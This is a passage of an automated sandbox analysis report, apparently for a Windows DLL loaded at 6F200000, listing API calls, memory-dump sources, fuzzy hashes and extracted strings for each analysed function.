                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetUserDefaultUILanguage.KERNEL32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206243
                                                                                                                                                                                                                      • Part of subcall function 6F206090: CreateMenu.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206258
                                                                                                                                                                                                                      • Part of subcall function 6F205FB0: CreateMenu.USER32(747DF500,770DC720,770DBF08,?,?,6F206417,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F205FE1
                                                                                                                                                                                                                      • Part of subcall function 6F205FB0: GetOpenClipboardWindow.USER32(747DF500,770DC720,770DBF08,?,?,6F206417,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206017
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClipboardCreateCurrentMenuOpenThread$DefaultDesktopSystem$AutomaticCursorForegroundLangLanguageMessageResumeTimeUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 961900505-0
                                                                                                                                                                                                                    • Opcode ID: cde3e2bb95a7f9275834256aca2d7a3c991206ec05848aa88284f4141fbc3e03
                                                                                                                                                                                                                    • Instruction ID: e4365d2668ddd250599f7a4f0c1c9447bb96ed1c4b79497bc13bd9f815d79222
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cde3e2bb95a7f9275834256aca2d7a3c991206ec05848aa88284f4141fbc3e03
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B39129B3914B0D8ED702B739C58931DF767AF9B364B148726E582B2890FF64A4E4CD40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 6F207EE6
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 6F207F18
                                                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6F207F40
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(-00000001), ref: 6F207F81
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 6F207FE9
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6F20800B
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208036
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208040
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208046
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208050
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F20805A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _com_issue_error$StringVariant$Alloc$ChangeClearFreeInitType
                                                                                                                                                                                                                    • String ID: counter$name$page$value
                                                                                                                                                                                                                    • API String ID: 661817203-1733285648
                                                                                                                                                                                                                    • Opcode ID: 40efd1118bbee3d6582e04f488248cc70fb9d89fbac4114bf789de09557db92e
                                                                                                                                                                                                                    • Instruction ID: bd077cf010a476e4df77953abce44c084e04f09d7795629db81c258b4ecc7be8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40efd1118bbee3d6582e04f488248cc70fb9d89fbac4114bf789de09557db92e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251E7B290470FDBD720EF64C948B8ABBF8EF05714F20451AE955A7680D7B4E950CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6F2113C9,?,00000000,?), ref: 6F210E2E
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F21107F
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 6F2110E4
                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,00000000,00000048), ref: 6F2110F9
                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6F211119
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 6F211131
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 6F211139
                                                                                                                                                                                                                    • DrawTextW.USER32(?,?,?,?,00000000), ref: 6F211171
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 6F211179
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 6F211180
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ObjectText$Select$CapsClientColorCreateDeleteDeviceDrawFontMetricsRect
                                                                                                                                                                                                                    • String ID: %s%d.%d%s$%s%s%s$[N/A]
                                                                                                                                                                                                                    • API String ID: 938400745-711029782
                                                                                                                                                                                                                    • Opcode ID: a60dbde8ea28fe371e80ba6bcf40f92a7d24070d396881006448ee81fcd0e619
                                                                                                                                                                                                                    • Instruction ID: dd76fc3104a9cac095fe195a7284cfef57e71f206ca5c6785c8aaabb2331f8fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a60dbde8ea28fe371e80ba6bcf40f92a7d24070d396881006448ee81fcd0e619
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70C190759042199BDB20CF24CCC5BDAB7B9FF49304F1481E9E609AB291DB30EA95CF64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F225FF7
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22600D
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22601E
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22602F
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226046
                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 6F22608E
                                                                                                                                                                                                                      • Part of subcall function 6F22D43E: _free.LIBCMT ref: 6F22D4A9
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226265
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226278
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226286
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226291
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262D3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262DB
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262E3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262EB
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262F9
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6F23C658,00000000,00000000,?,?,?,00000004,00000000,00000001,6F23C658,0000007F,?,?), ref: 6F22D638
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6F22D6AD
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F22D6BF
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: __freea.LIBCMT ref: 6F22D6C8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InfoStringType__freea
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 607174680-0
                                                                                                                                                                                                                    • Opcode ID: 212343880c7cf1c2b516174b752c13a7e4748c3c3edd42910601ebfa1e137598
                                                                                                                                                                                                                    • Instruction ID: ee37701e2f5b6cbdc4391b5a203f56a9866fd725ea2422333dd510bc2491c1cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212343880c7cf1c2b516174b752c13a7e4748c3c3edd42910601ebfa1e137598
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C18D71D0434A9FDB11CFA8C880BEEBBF5FF09304F10416AE499AB691D775A9418F60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,819F5D14,75C6D5B0,00000000), ref: 6F208EE4
                                                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F208EF2
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,819F5D14,75C6D5B0,00000000), ref: 6F208F0F
                                                                                                                                                                                                                    • VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F208F28
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208F37
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F2091D4
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F209226
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F209234
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F209239
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(75C6D5B0), ref: 6F209244
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Free$ByteCharMultiWide$AllocBstrConcurrency::cancel_current_task_com_issue_error
                                                                                                                                                                                                                    • String ID: Arial$line
                                                                                                                                                                                                                    • API String ID: 3866382671-367345269
                                                                                                                                                                                                                    • Opcode ID: 8310358d5525206c9e261aae3281d829493029b9ef5aa64dd352949e5bfbc2cf
                                                                                                                                                                                                                    • Instruction ID: f5bc65b3500ec8c2e48e22af8c849d0f1e10d0b3595c22858eb6d4dd4890d5dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8310358d5525206c9e261aae3281d829493029b9ef5aa64dd352949e5bfbc2cf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22E1CF72A0030EDFEB10DFA4C988B9EBBB5AF45314F10425DE416AB784D774AA54CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6F230F60
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2326D2
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2326E4
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2326F6
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232708
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F23271A
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F23272C
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F23273E
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232750
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232762
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232774
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232786
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F232798
                                                                                                                                                                                                                      • Part of subcall function 6F2326B5: _free.LIBCMT ref: 6F2327AA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F55
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F77
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F8C
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230F97
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FB9
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FCC
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FDA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F230FE5
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F23101D
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F231024
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F231041
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F231059
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                    • Opcode ID: 112e3bc07400d9cf44ee886cf67bee1007b5d84341bf9c4acc1520e8352221e4
                                                                                                                                                                                                                    • Instruction ID: 9141e6687cb1a912de6b7b19196a51c9bb8731b57a3a3df607677a7acc735c5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 112e3bc07400d9cf44ee886cf67bee1007b5d84341bf9c4acc1520e8352221e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C231FCB2E0C7199FE7219A79D840B9A73E9EF00719F10941AE469D6690DF75B9808F20
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $Tm"o
                                                                                                                                                                                                                    • API String ID: 0-3147287586
                                                                                                                                                                                                                    • Opcode ID: fb4fd172e80a6a2ab07d875f59a616e578401667dda2bf12f80319a9d7597f19
                                                                                                                                                                                                                    • Instruction ID: 6a598a7147472c2480c6831381e9e22ca7f429d223b5d99a24b56555b41992e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb4fd172e80a6a2ab07d875f59a616e578401667dda2bf12f80319a9d7597f19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C1AF75F4834EAFDB018FA8C840B9EBBF5BF0A314F114199E914AB681C774A905CF62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6F219E57
                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6F219E79
                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6F219F88
                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6F219FD9
                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6F21A05A
                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6F21A0DE
                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6F21A0F9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                    • API String ID: 4234981820-393685449
                                                                                                                                                                                                                    • Opcode ID: 5f635b6c8c9af9e07d094cad06b275084809d6e8b196e75932d968065e592fd7
                                                                                                                                                                                                                    • Instruction ID: d69e1f2550719bf9bcbd88f919f5e705b96a64b74c0960186c1dd828d78b1af9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f635b6c8c9af9e07d094cad06b275084809d6e8b196e75932d968065e592fd7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFB1757180820EAFCF15CFA4C880A9EBBF5BF08315F10415AEA146B655D732EA65CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24BA20), ref: 6F2123C4
                                                                                                                                                                                                                    • GetClassInfoExW.USER32 ref: 6F2123F9
                                                                                                                                                                                                                    • GetClassInfoExW.USER32 ref: 6F21240C
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F212417
                                                                                                                                                                                                                    • LoadCursorW.USER32(6F200000,?), ref: 6F212469
                                                                                                                                                                                                                    • GetClassInfoExW.USER32 ref: 6F2124BF
                                                                                                                                                                                                                    • RegisterClassExW.USER32 ref: 6F2124CF
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F212562
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
                                                                                                                                                                                                                    • String ID: 0$ATL:%p
                                                                                                                                                                                                                    • API String ID: 269841140-2453800769
                                                                                                                                                                                                                    • Opcode ID: 2112cf21bcc9e6a1b9a7b1bfb5a41405681f6541d6ba5cb61e81b1323247cde9
                                                                                                                                                                                                                    • Instruction ID: 064c85aa7b390db74cf9e560578e25c16577cb218439f0a8e286ebf15384db74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2112cf21bcc9e6a1b9a7b1bfb5a41405681f6541d6ba5cb61e81b1323247cde9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A36127B1904B09DBDB24DF68C4945AAB7F5FF4A320B00461DF98A9BA90EB70F494CF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204F7F
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204FA1
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204FC1
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F20512A
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F205142
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F205164
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F205169
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F20516E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                    • API String ID: 3742692055-2658103896
                                                                                                                                                                                                                    • Opcode ID: 61047777feffe17b983b8547c0a04b5ee177f378f59254802f10c197e9d0bebb
                                                                                                                                                                                                                    • Instruction ID: 0b9d5237f5841e34e13af9e186dfc87b657843ff269eb2d2e00f7985cd277f8f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61047777feffe17b983b8547c0a04b5ee177f378f59254802f10c197e9d0bebb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A61EBB1904709CBDB10EFA8C844B9EBBF1FF05718F10815DD805AB680DBB5AA48CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6F20DF2E
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(00000000,?,00000000,00000000), ref: 6F20DF5B
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF74
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF7F
                                                                                                                                                                                                                      • Part of subcall function 6F20DEF0: CharNextW.USER32(00000001,?,00000000,00000000), ref: 6F20DFEE
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,6F244954,?,819F5D14,?,00000000,C000008C,?,00000000,6F237E4B,000000FF,?,6F20F0EE,00000000,00000000,C000008C), ref: 6F20E133
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,6F244958,?,6F20F0EE,00000000,00000000,C000008C,C000008C), ref: 6F20E14A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext$lstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3586774192-0
                                                                                                                                                                                                                    • Opcode ID: 149abcb8d0f81715b65c8fcfb6f0799a6a5c02ba761835baf5cd3a60254717fe
                                                                                                                                                                                                                    • Instruction ID: dc7afc5477434f5b8f2ea9802371096b7ac5beaa96bafec7737ff13cbe15e818
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149abcb8d0f81715b65c8fcfb6f0799a6a5c02ba761835baf5cd3a60254717fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47D10573D0062EDBDB24EB24CD59BD9B7B5AF19300F050596EA48A7280E730AED9CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 6F2103C8
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6F2103F5
                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 6F2103FE
                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000), ref: 6F210407
                                                                                                                                                                                                                    • ReleaseDC.USER32 ref: 6F210414
                                                                                                                                                                                                                    • SetTimer.USER32 ref: 6F210429
                                                                                                                                                                                                                      • Part of subcall function 6F211260: BeginPaint.USER32(?,?), ref: 6F2112A3
                                                                                                                                                                                                                      • Part of subcall function 6F211260: GetParent.USER32(?), ref: 6F2112AC
                                                                                                                                                                                                                      • Part of subcall function 6F211260: GetClientRect.USER32 ref: 6F2112C2
                                                                                                                                                                                                                      • Part of subcall function 6F211260: CreateCompatibleDC.GDI32(?), ref: 6F2112C8
                                                                                                                                                                                                                      • Part of subcall function 6F211260: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F2112EA
